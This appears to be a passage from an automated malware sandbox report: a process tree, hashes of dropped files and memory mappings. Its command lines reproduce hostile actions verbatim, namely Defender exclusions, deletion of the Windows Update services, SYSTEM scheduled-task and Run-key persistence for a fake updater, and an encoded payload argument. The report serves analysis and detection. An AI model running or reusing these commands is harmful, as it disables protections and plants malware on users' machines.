      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
    (3) C:\Windows\system32\schtasks.exe
        cmdline: "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
  (2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
  (2) C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop UsoSvc
        - Launches sc.exe
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop WaaSMedicSvc
        - Launches sc.exe
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop wuauserv
        - Launches sc.exe
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop bits
        - Launches sc.exe
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    (3) C:\Windows\System32\sc.exe
        cmdline: sc stop dosvc
        - Launches sc.exe
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    (3) C:\Windows\System32\reg.exe
        cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  (2) C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    (3) C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-ac 0
    (3) C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -hibernate-timeout-dc 0
    (3) C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-ac 0
    (3) C:\Windows\System32\powercfg.exe
        cmdline: powercfg /x -standby-timeout-dc 0
  (2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
  (2) C:\Windows\System32\conhost.exe
      cmdline: C:\Windows\System32\conhost.exe zuhwtyqtfkk
      - Suspicious use of NtCreateUserProcessOtherParentProcess
  (2) C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
    (3) C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic PATH Win32_VideoController GET Name, VideoProcessor
  (2) C:\Windows\System32\cmd.exe
      cmdline: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
  (2) C:\Windows\System32\conhost.exe
      cmdline: C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
      - Modifies data under HKEY_USERS

(1) C:\Windows\system32\rundll32.exe
    cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
  (2) C:\Windows\SysWOW64\rundll32.exe
      cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
      - Loads dropped DLL
    (3) C:\Windows\SysWOW64\WerFault.exe
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 600
        - Program crash

(1) C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4156 -ip 4156

(1) C:\Windows\system32\rundll32.exe
    cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
  (2) C:\Windows\SysWOW64\rundll32.exe
      cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
      - Loads dropped DLL
    (3) C:\Windows\SysWOW64\WerFault.exe
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 600
        - Program crash

(1) C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2900 -ip 2900

(1) C:\Windows\System32\rundll32.exe
    cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

(1) C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
    - Executes dropped EXE

(1) C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4216 -ip 4216

(1) C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4216 -ip 4216

(1) C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -pss -s 528 -p 3784 -ip 3784

(1) C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 520 -ip 520

(1) C:\Program Files\Notepad\Chrome\updater.exe
    cmdline: "C:\Program Files\Notepad\Chrome\updater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory

(1) C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
    - Executes dropped EXE

(1) C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
    - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Program Files\Google\Libs\g.log
  Filesize: 226B
  MD5: fdba80d4081c28c65e32fff246dc46cb
  SHA1: 74f809dedd1fc46a3a63ac9904c80f0b817b3686
  SHA256: b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
  SHA512: b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

- C:\Program Files\Notepad\Chrome\updater.exe
  Filesize: 3.7MB
  MD5: 3006b49f3a30a80bb85074c279acc7df
  SHA1: 728a7a867d13ad0034c29283939d94f0df6c19df
  SHA256: f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
  SHA512: e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

- C:\ProgramData\mozglue.dll
  Filesize: 133KB
  MD5: 8f73c08a9660691143661bf7332c3c27
  SHA1: 37fa65dd737c50fda710fdbde89e51374d0c204a
  SHA256: 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
  SHA512: 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

- C:\ProgramData\nss3.dll
  Filesize: 1.2MB
  MD5: bfac4e3c5908856ba17d41edcd455a51
  SHA1: 8eec7e888767aa9e4cca8ff246eb2aacb9170428
  SHA256: e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
  SHA512: 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: d28a889fd956d5cb3accfbaf1143eb6f
  SHA1: 157ba54b365341f8ff06707d996b3635da8446f7
  SHA256: 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
  SHA512: 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 8808750cf94934c2a6471ccc5f0b932a
  SHA1: dd1f5c5a7b725ecb0e4e96e0cebb62721e774dab
  SHA256: ffe821af02d97eeb40bca0f73c858296c854263a5477941c3bc4eb649289d69c
  SHA512: 30b7e3f958621a284e95f2503daa1f5a0a10e01f18ed4e2ce9ebbba356a9d2a5bc4f15d3284863d405c24b9aa9181ec8cdf9def74a223a741aeb51d8190caa29

- C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe
  Filesize: 3.5MB
  MD5: 17d8b23d0a991861f9a34ca2853bd267
  SHA1: 54325fa47d6423bef266ff925fdc22b65ae883cb
  SHA256: 23b2cb63c39cad03761fa30d91e0d5a90df17aae5c3b7cbf3a2172d59824efe1
  SHA512: 1c1fa7f991a5ab650c3279d56b9e1d3a77d623a568a15057c7b084f96e71e57047319a6a45e9f2e71767fadf8bf0bc647124b8b9ee03d9c63d250bd9f9c0764d

- C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe
  Filesize: 160KB
  MD5: b9363486500e209c05f97330226bbf8a
  SHA1: bfe2d0072d09b30ec66dee072dde4e7af26e4633
  SHA256: 01138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35
  SHA512: 6d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534

- C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe
  Filesize: 3.7MB
  MD5: 3006b49f3a30a80bb85074c279acc7df
  SHA1: 728a7a867d13ad0034c29283939d94f0df6c19df
  SHA256: f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
  SHA512: e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

- C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe
  Filesize: 169KB
  MD5: 0f5f8000ce6bbb68cc262b166286bde6
  SHA1: 1ef1e20162fd5619f04e858937366577db7080f9
  SHA256: 2d06d337b3b0a536a5e7b0249c6752539301e3e0d223ecd9d0a7b6c17e9f558e
  SHA512: 65f5d4546bfda6bba241138b5ac3621b35e654b0eae1a86acb693bb7203f288ad71e264547bcf402e03288ab84b07fa73c9963c9af2bab4589b32f71f26d5c18

- C:\Users\Admin\AppData\Local\Temp\1000097001\download.exe
  Filesize: 1.2MB
  MD5: 7f07ad611a288398f431548586a125df
  SHA1: 085493bd1897d914976836e14e2a0d79e380c885
  SHA256: e50397ecbbe76b166d1477cf8e3468b6c7fe90165b141c5131141d8881476f43
  SHA512: ea0d4259b507b905156fb9781076f4cc7aa98558b3b051a46af5f0308fa32c29e67f4657ee371cceb82ee5e8f5c201f172f41e887c3e3f029c901f897c3fc642

- C:\Users\Admin\AppData\Local\Temp\1000098001\download.exe
  Filesize: 1.2MB
  MD5: 7f07ad611a288398f431548586a125df
  SHA1: 085493bd1897d914976836e14e2a0d79e380c885
  SHA256: e50397ecbbe76b166d1477cf8e3468b6c7fe90165b141c5131141d8881476f43
  SHA512: ea0d4259b507b905156fb9781076f4cc7aa98558b3b051a46af5f0308fa32c29e67f4657ee371cceb82ee5e8f5c201f172f41e887c3e3f029c901f897c3fc642

- C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
  Filesize: 244KB
  MD5: 43a3e1c9723e124a9b495cd474a05dcb
  SHA1: d293f427eaa8efc18bb8929a9f54fb61e03bdd89
  SHA256: 619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
  SHA512: 6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

- C:\Users\Admin\AppData\Local\Temp\36A0.exe
  Filesize: 3.1MB
  MD5: c79db0e3f2b11791dfe7447b67bf4285
  SHA1: 8c5129780023e578097bd3a096cc3bef6e3c5586
  SHA256: bf4b3786b07e3ac17c257a56e260f464aa5269c9af640a92b4418f432da92394
  SHA512: c9f58660c8b9a7cc702cab69a3aff04d872d0c9d62c17146bc287d081ed44b4b457c90f42a4af56608378638f64be14eebb39b93b07ecc4332b6b6057b8955f3

- C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll
  Filesize: 4.2MB
  MD5: 07c6e37765ea4f794d640e91899addd0
  SHA1: 542bf20d57bdb66cb106919834cfd7965481cb3c
  SHA256: e28c48bda266300112fcf2d02a30620c441a25c5687f2c93f6010c6ac9de5c9f
  SHA512: b490c7054bab07a44d75d05a50107d8890ce2cef0b1501c0965e4cf928c0761b121e41b1ad986dc1483a8d84ead45811e386d3f77005b954424467cfc75bb7ae

- C:\Users\Admin\AppData\Local\Temp\Player3.exe
  Filesize: 244KB
  MD5: 43a3e1c9723e124a9b495cd474a05dcb
  SHA1: d293f427eaa8efc18bb8929a9f54fb61e03bdd89
  SHA256: 619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
  SHA512: 6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

- C:\Users\Admin\AppData\Local\Temp\birge.exe
  Filesize: 4.1MB
  MD5: c5258a190ce2684850af553aff00bcf1
  SHA1: 6d1af578d44a08f3c0d986639ba02e5a681b1018
  SHA256: d5ad882f073204e5a841f0478fbf27ee1ad4ae2bbf09853fedf85cea9c35bb98
  SHA512: e815aa48ba7854cc494c48093d1677472446b2eee6b12fa0989be43587e3f9522520bb5b695af02f3603036fda59060ff3c15b39f1fff3028c06256353ee98f1

- C:\Users\Admin\AppData\Local\Temp\db.dat
  Filesize: 557KB
  MD5: 30d5f615722d12fdda4f378048221909
  SHA1: e94e3e3a6fae8b29f0f80128761ad1b69304a7eb
  SHA256: b7cb464cd0c61026ec38d89c0a041393bc9369e217303677551eec65a09d2628
  SHA512: a561a224d7228ec531a966c7dbd6bc88138e2f4a1c8112e5950644f69bf3a43b1e87e03bc1b4fd5e9ca071b5a9353b18697573404602ccd51f2946faf95144c2

- C:\Users\Admin\AppData\Local\Temp\db.dll
  Filesize: 52KB
  MD5: 0b35335b70b96d31633d0caa207d71f9
  SHA1: 996c7804fe4d85025e2bd7ea8aa5e33c71518f84
  SHA256: ec01d244074f45d4f698f5713147e99d76053824a648b306e1debf69f3ba9ce6
  SHA512: ab3d770e99b3f379165863808f3ffc55d64d8e9384a158e6695d7325e97fa1bb570c5088ccdc1d2c3b90df5be11d6722ede15e7b6552bf90e748cb9c28ab94ce

- C:\Users\Admin\AppData\Local\Temp\pb1111.exe
  Filesize: 3.5MB
  MD5: 12af31a83714f11103e061ac722195e0
  SHA1: a0b08575934a67b38a6e12900776b4c91a4fc022
  SHA256: ac371bda90a40da22f6fcf633b7ad731c9b11de21cc91ed47ab12cbe18d18ae5
  SHA512: 6fba6d1763520d37a6108be7253a43b3afad8133e23935fffdb98c8a1ab11d13a411a81dd3eddadefd816a452600aca85bb37c53577fcc784a777f82bb7ce218

- C:\Users\Admin\AppData\Local\Temp\slwang.exe
  Filesize: 160KB
  MD5: b9363486500e209c05f97330226bbf8a
SHA1bfe2d0072d09b30ec66dee072dde4e7af26e4633
SHA25601138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35
SHA5126d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534
-
C:\Users\Admin\AppData\Local\Temp\slwang.exeFilesize
160KB
MD5b9363486500e209c05f97330226bbf8a
SHA1bfe2d0072d09b30ec66dee072dde4e7af26e4633
SHA25601138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35
SHA5126d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534
-
C:\Users\Admin\AppData\Local\Temp\slwang.exeFilesize
160KB
MD5b9363486500e209c05f97330226bbf8a
SHA1bfe2d0072d09b30ec66dee072dde4e7af26e4633
SHA25601138f2318e59e1fe59f1eb7de3859af815ebf9a59aae1084c1a97a99319ee35
SHA5126d06e5baeab962d85b306c72f39a82e40e22eb889867c11c406a069011155cb8901bf021f48efc98fd95340be7e9609fc11f4e24fc322dbf721e610120771534
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
memory/64-203-0x0000000000000000-mapping.dmp
-
memory/204-152-0x0000000000000000-mapping.dmp
-
memory/324-274-0x00007FF809730000-0x00007FF80A1F1000-memory.dmp
Filesize 10.8MB
-
memory/324-269-0x00007FF809730000-0x00007FF80A1F1000-memory.dmp
Filesize 10.8MB
-
memory/520-245-0x0000000000400000-0x0000000002E81000-memory.dmp
Filesize 42.5MB
-
memory/520-243-0x0000000004BD9000-0x0000000004ED9000-memory.dmp
Filesize 3.0MB
-
memory/520-244-0x0000000004EE0000-0x000000000529C000-memory.dmp
Filesize 3.7MB
-
memory/520-270-0x0000000000400000-0x0000000002E81000-memory.dmp
Filesize 42.5MB
-
memory/520-233-0x0000000000000000-mapping.dmp
-
memory/592-133-0x0000000000000000-mapping.dmp
-
memory/600-258-0x0000000000000000-mapping.dmp
-
memory/756-307-0x0000000000000000-mapping.dmp
-
memory/780-261-0x0000000000000000-mapping.dmp
-
memory/932-145-0x0000000140000000-0x0000000140618000-memory.dmp
Filesize 6.1MB
-
memory/932-136-0x0000000000000000-mapping.dmp
-
memory/960-236-0x0000000000000000-mapping.dmp
-
memory/1020-162-0x0000000000000000-mapping.dmp
-
memory/1260-139-0x0000000000000000-mapping.dmp
-
memory/1388-255-0x0000000000000000-mapping.dmp
-
memory/1396-318-0x0000000000000000-mapping.dmp
-
memory/1412-141-0x0000000000000000-mapping.dmp
-
memory/1780-253-0x0000000000000000-mapping.dmp
-
memory/1876-154-0x0000000000000000-mapping.dmp
-
memory/2076-251-0x0000000000000000-mapping.dmp
-
memory/2144-308-0x0000000000000000-mapping.dmp
-
memory/2208-231-0x0000000000000000-mapping.dmp
-
memory/2296-165-0x0000000000000000-mapping.dmp
-
memory/2320-315-0x0000000000000000-mapping.dmp
-
memory/2384-277-0x0000000003730000-0x0000000004281000-memory.dmp
Filesize 11.3MB
-
memory/2384-282-0x0000000004390000-0x00000000044D0000-memory.dmp
Filesize 1.2MB
-
memory/2384-290-0x0000000003730000-0x0000000004281000-memory.dmp
Filesize 11.3MB
-
memory/2384-276-0x0000000003730000-0x0000000004281000-memory.dmp
Filesize 11.3MB
-
memory/2384-275-0x0000000003730000-0x0000000004281000-memory.dmp
Filesize 11.3MB
-
memory/2384-279-0x0000000004390000-0x00000000044D0000-memory.dmp
Filesize 1.2MB
-
memory/2384-280-0x0000000004390000-0x00000000044D0000-memory.dmp
Filesize 1.2MB
-
memory/2384-285-0x0000000004409000-0x000000000440B000-memory.dmp
Filesize 8KB
-
memory/2384-281-0x0000000004390000-0x00000000044D0000-memory.dmp
Filesize 1.2MB
-
memory/2384-278-0x0000000004390000-0x00000000044D0000-memory.dmp
Filesize 1.2MB
-
memory/2384-259-0x0000000000000000-mapping.dmp
-
memory/2384-283-0x0000000004390000-0x00000000044D0000-memory.dmp
Filesize 1.2MB
-
memory/2660-254-0x0000000000000000-mapping.dmp
-
memory/2660-313-0x0000000000000000-mapping.dmp
-
memory/2736-324-0x0000000000000000-mapping.dmp
-
memory/2740-164-0x0000000000000000-mapping.dmp
-
memory/2836-304-0x0000000000000000-mapping.dmp
-
memory/2900-189-0x0000000000000000-mapping.dmp
-
memory/2996-153-0x0000000000000000-mapping.dmp
-
memory/3028-158-0x0000000000400000-0x0000000000B67000-memory.dmp
Filesize 7.4MB
-
memory/3028-166-0x0000000000400000-0x0000000000B67000-memory.dmp
Filesize 7.4MB
-
memory/3028-192-0x0000000076E70000-0x0000000077013000-memory.dmp
Filesize 1.6MB
-
memory/3028-173-0x0000000000400000-0x0000000000B67000-memory.dmp
Filesize 7.4MB
-
memory/3028-144-0x0000000000000000-mapping.dmp
-
memory/3028-180-0x0000000000400000-0x0000000000B67000-memory.dmp
Filesize 7.4MB
-
memory/3028-171-0x0000000076E70000-0x0000000077013000-memory.dmp
Filesize 1.6MB
-
memory/3028-161-0x0000000000400000-0x0000000000B67000-memory.dmp
Filesize 7.4MB
-
memory/3028-292-0x0000000000400000-0x0000000000B67000-memory.dmp
Filesize 7.4MB
-
memory/3028-293-0x0000000076E70000-0x0000000077013000-memory.dmp
Filesize 1.6MB
-
memory/3148-300-0x000002E64C310000-0x000002E64C318000-memory.dmp
Filesize 32KB
-
memory/3148-299-0x000002E64C360000-0x000002E64C37A000-memory.dmp
Filesize 104KB
-
memory/3148-303-0x00007FF809730000-0x00007FF80A1F1000-memory.dmp
Filesize 10.8MB
-
memory/3148-296-0x000002E64C1B0000-0x000002E64C1BA000-memory.dmp
Filesize 40KB
-
memory/3148-295-0x00007FF809730000-0x00007FF80A1F1000-memory.dmp
Filesize 10.8MB
-
memory/3148-298-0x000002E64C300000-0x000002E64C30A000-memory.dmp
Filesize 40KB
-
memory/3148-294-0x000002E64C0D0000-0x000002E64C0EC000-memory.dmp
Filesize 112KB
-
memory/3148-297-0x000002E64C320000-0x000002E64C33C000-memory.dmp
Filesize 112KB
-
memory/3148-302-0x000002E64C350000-0x000002E64C35A000-memory.dmp
Filesize 40KB
-
memory/3148-301-0x000002E64C340000-0x000002E64C346000-memory.dmp
Filesize 24KB
-
memory/3172-256-0x0000000000000000-mapping.dmp
-
memory/3352-311-0x0000000000000000-mapping.dmp
-
memory/3436-186-0x0000000000000000-mapping.dmp
-
memory/3504-263-0x0000000000000000-mapping.dmp
-
memory/3512-160-0x0000000000000000-mapping.dmp
-
memory/3760-155-0x0000000000000000-mapping.dmp
-
memory/3764-246-0x00007FF808DB0000-0x00007FF809871000-memory.dmp
Filesize 10.8MB
-
memory/3764-242-0x00007FF808DB0000-0x00007FF809871000-memory.dmp
Filesize 10.8MB
-
memory/3764-241-0x000001D5125D0000-0x000001D5125F2000-memory.dmp
Filesize 136KB
-
memory/3780-309-0x0000000000000000-mapping.dmp
-
memory/3784-239-0x0000000000000000-mapping.dmp
-
memory/3828-305-0x0000000000000000-mapping.dmp
-
memory/3892-286-0x00000223BAAA0000-0x00000223BABE0000-memory.dmp
Filesize 1.2MB
-
memory/3892-289-0x00000223B9050000-0x00000223B92F3000-memory.dmp
Filesize 2.6MB
-
memory/3892-287-0x00000223BAAA0000-0x00000223BABE0000-memory.dmp
Filesize 1.2MB
-
memory/3892-284-0x00007FF7D5DB6890-mapping.dmp
-
memory/3892-288-0x0000000000D00000-0x0000000000F91000-memory.dmp
Filesize 2.6MB
-
memory/3900-319-0x0000000000000000-mapping.dmp
-
memory/3924-265-0x0000000000000000-mapping.dmp
-
memory/3944-320-0x00007FF809730000-0x00007FF80A1F1000-memory.dmp
Filesize 10.8MB
-
